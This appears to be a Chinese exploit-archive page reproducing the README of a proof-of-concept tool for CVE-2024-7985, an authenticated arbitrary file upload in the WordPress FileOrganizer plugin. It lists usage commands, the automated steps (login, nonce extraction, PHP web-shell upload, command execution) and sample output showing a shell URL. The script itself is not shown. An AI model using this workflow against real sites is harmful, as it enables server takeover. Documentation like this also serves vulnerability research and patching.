关联漏洞
标题:
WordPress plugin FileOrganizer 代码问题漏洞
(CVE-2024-7985)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin FileOrganizer 1.0.9版本及之前版本存在代码问题漏洞,该漏洞源于“fileorganizer_ajax_handler”函数中缺少文件类型验证。
描述
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload
介绍
# CVE-2024-7985-PoC
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload
# FileOrganizer Exploit - CVE-2024-7985
## 📌 Overview
**CVE-2024-7985** - WordPress Plugin **FileOrganizer <= 1.0.9** is vulnerable to **authenticated arbitrary file uploads**, allowing attackers with **Subscriber+** privileges to upload and execute malicious files remotely. This vulnerability arises from **missing file type validation** in the `fileorganizer_ajax_handler` function, making **Remote Code Execution (RCE) possible**.
🚨 **This exploit allows attackers to execute arbitrary commands on the server!** 🚨
## ⚡ Features
- ✅ **Automates the attack** - Login, retrieve nonce, exploit.
- ✅ **Bypasses security checks** by utilizing authenticated user privileges.
- ✅ **Automatic version detection** - Ensures the target is vulnerable.
- ✅ **Custom command execution** - User can specify any command.
- ✅ **Handles SSL verification issues** seamlessly.
## 🛠️ Requirements
- **Python 3**
- `requests`
- `beautifulsoup4`
Install dependencies:
```bash
pip install requests beautifulsoup4
```
## 🚀 Usage
```bash
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
```
## 📖 Usage -Help
```
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
```
### Example Output:
```
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
```
## 🔍 Exploit Workflow
1️⃣ **Version Check** - Determines if the site is vulnerable.
2️⃣ **Authentication** - Logs into WordPress.
3️⃣ **Nonce Extraction** - Retrieves security token.
4️⃣ **File Upload** - Uploads a malicious PHP script.
5️⃣ **Command Execution** - Executes user-specified commands.
---
### 📌 Disclaimer
This script is for educational purposes only; the author holds no responsibility for any misuse or consequences. 🚨
文件快照
[4.0K] /data/pocs/838a097d0748625274086ff0bd7c860891514696
├── [4.3K] CVE-2024-7985.py
└── [2.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。